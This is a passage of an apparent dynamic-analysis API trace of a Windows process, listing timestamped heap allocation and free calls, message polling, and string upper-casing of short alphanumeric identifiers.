hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0263.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0263.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0263.082] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0263.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0263.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0263.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0263.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0263.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0263.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0263.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0263.083] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0263.083] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0263.083] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0263.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0263.083] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0263.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0263.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa860 [0263.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0263.083] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0263.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0263.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0263.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0263.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0263.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0263.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0263.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0263.084] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0263.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0263.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0263.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0263.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0263.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0263.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0263.084] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0263.084] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0263.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0263.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0263.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0263.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0263.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0263.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0263.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0263.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0263.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0263.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0263.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0263.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0263.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0263.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.085] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0263.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0263.086] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0263.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0263.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0263.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0263.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0263.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0263.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0263.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0263.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0263.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0263.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0263.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0263.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0263.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0263.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0263.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0263.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0263.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0263.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0263.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0263.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0263.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0263.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0263.087] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0263.087] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0263.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0263.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0263.087] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0263.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0263.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0263.087] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0263.088] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0263.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0263.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0263.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0263.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0263.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0263.088] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0263.088] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.088] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0263.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0263.088] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0263.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0263.088] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0263.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0263.088] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0263.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0263.088] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0263.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0263.089] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0263.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0263.089] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0263.089] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0263.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0263.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0263.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0263.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0263.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0263.089] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0263.089] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.089] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0263.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0263.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0263.089] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0263.089] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0263.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0263.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0263.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0263.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0263.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0263.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0263.090] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0263.090] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0263.090] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0263.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0263.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0263.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0263.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0263.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0263.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0263.090] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.090] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0263.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0263.090] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0263.090] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0263.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0263.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0263.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0263.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0263.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0263.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0263.090] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0263.090] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0263.090] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0263.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0263.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0263.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0263.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0263.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0263.091] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0263.091] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0263.091] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0263.091] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0263.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0263.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0263.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0263.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0263.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0263.091] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0263.091] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0263.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0263.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0263.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0263.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0263.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0263.091] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0263.091] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.092] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0263.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0263.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0263.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0263.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0263.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0263.092] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0263.092] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0263.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0263.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0263.092] RtlAllocateHeap 